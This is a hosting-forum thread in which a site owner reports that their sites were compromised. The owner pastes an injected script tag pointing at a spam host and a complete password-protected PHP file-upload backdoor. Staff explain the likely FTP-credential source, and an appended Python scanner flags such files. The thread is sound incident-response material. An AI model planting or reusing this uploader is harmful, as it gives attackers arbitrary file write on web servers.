Websites hacked

Discussion in 'H-Sphere Reseller Hosting' started by BluJag, Jan 31, 2016.

  1. BluJag

    BluJag Perch

    All my sites on Web4 have been hacked by a Japanese shopping organisation. I'm in the long process of trying to delete the thousands and thousands of files which have been uploaded.

    This is a snippet from one of the html files

    <script type="text/javascript" src="http://iclothesshow.top/js/clotho.js"></script>shop/item/3390.html"

    and

    <dd><a href="http://www.mungaz.net/engine/eX0-Spring-short-coat-U7.html">Mila Owen 無地衿付きニットトップス ミラオーウェン</a></dd>

    and

    <div class=copyright>
    <div class=inner>
    <div class=policy> <a href="http://www.orbis.co.jp/contents/company/privacy/">個人情報保護方針</a><span>|</span><a href="/snspolicy/">ソーシャルメディアポリシー</a> </div>
    <p> <img src="http://www.orbis.co.jp/contents/images/foot/2015copyright.png" alt="copyright © 1999-2015 orbis inc. all rights reserved." width=266 height=11><img src="http://www.orbis.co.jp/contents/images/foot/footer_logo.gif" alt=orbis width=43 height=16 class=footlogo><br>
    </p>
    </div>
    </div>

    Plus there are PHP files too, e.g.

    $config_password="yt";
    $action=$_REQUEST['action'];
    $password=$_REQUEST['password'];
    $folderpath=$_REQUEST['folderpath'];
    $filename=$_REQUEST['filename'];
    $body=stripslashes($_REQUEST['body']);

    if($password==""||$filename==""||$body=="")
    {
    echo 'parameters error!';
    return;
    }

    if($password!=$config_password)
    {
    echo 'password error!';
    return;
    }

    $rootPath=$_SERVER['DOCUMENT_ROOT'];
    $newPath=$rootPath;

    if($folderpath!="")
    {
    if($folderpath=="root")
    {
    $newPath=$rootPath.'/'.$filename;
    }
    else
    {
    createFolder($rootPath.'/'.$folderpath);
    $newPath=$rootPath.'/'.$folderpath.'/'.$filename;
    }
    }
    else
    {
    $newPath=$filename;
    }


    $fp=fopen($newPath,"w");
    //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
    fwrite($fp,$body);
    fclose($fp);

    if(file_exists($newPath))
    {
    echo "publish success & uploaded";
    }

    function createFolder($path)
    {
    if (!file_exists($path))
    {
    createFolder(dirname($path));
    mkdir($path, 0777);
    }
    }

    Suggest everyone checks their own sites!
    Last edited: Jan 31, 2016
  2. abhishek

    abhishek Administrator Staff Member

    Seems an iframe script was added to your domain web files. There are many ways this can happen; most often it is due to a stolen FTP password. It doesn't come from your PC, but the Gumblar worm steals it from your PC and it is later used by FTP to infect your pages. We recommend you scan all computers that have FTP access to this account, or have had access to it in the past. This is to be done until an infection is found and cleaned. Also, change the password of the main and the sub-FTP account.
  3. BluJag

    BluJag Perch

    Will do - thanks for the advice
  4. Stephen

    Stephen US Operations Staff Member

    That PHP file likely got uploaded, and then they did the rest via that, making it much harder to find the real source since it will be hidden in just a single line and then used via the website by many botnets to upload.
  5. BluJag

    BluJag Perch

    Thanks Stephen, I'm going through all the files on the server.
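
A triage scanner for the cleanup described in this thread, added here as an example and not code from any poster or from the host: it flags PHP files that combine request input with a file write, as the posted snippet does, and pages that link to the hosts quoted in the first post. The function names, indicator labels and sample files are assumptions made for illustration.

```python
import os
import re

# Hosts quoted in the first post; extend with what your own injected pages reference.
INJECTED_HOSTS = ("iclothesshow.top", "mungaz.net")
# Heuristics modelled on the posted PHP: request input written straight to a file.
REQUEST_INPUT = re.compile(r"\$_(?:REQUEST|POST|GET)\s*\[")
WRITE_CALL = re.compile(r"\b(?:fwrite|fputs|file_put_contents)\s*\(")
MKDIR_0777 = re.compile(r"\bmkdir\s*\([^;]*\b0777\b")
EXTERNAL_REF = re.compile(r"(?:src|href)\s*=\s*[\"']?https?://([^/\"'\s>]+)", re.I)
# Constructed sample files; the PHP lines are excerpts of the posted snippet.
SAMPLES = {
    "up.php": "<?php $body=stripslashes($_REQUEST['body']);\n"
              "$fp=fopen($newPath,\"w\"); fwrite($fp,$body); mkdir($path, 0777);",
    "page.html": '<script src="http://iclothesshow.top/js/clotho.js"></script>',
    "clean.php": "<?php echo 'hello'; ?>",
}


def scan_text(text, hosts=INJECTED_HOSTS):
    """Return the sorted indicator names found in one file's text."""
    hits = set()
    if REQUEST_INPUT.search(text) and WRITE_CALL.search(text):
        hits.add("php-request-to-file-write")
    if MKDIR_0777.search(text):
        hits.add("php-mkdir-0777")
    for host in EXTERNAL_REF.findall(text):
        host = host.lower()
        if any(host == h or host.endswith("." + h) for h in hosts):
            hits.add("injected-link:" + host)
    return sorted(hits)


def scan_tree(root, exts=(".php", ".html", ".htm")):
    """Walk a web root; map relative path -> indicators for each flagged file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_text(body))
```

Legitimate upload handlers also match the PHP heuristic, so treat the report as a review list rather than a delete list.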
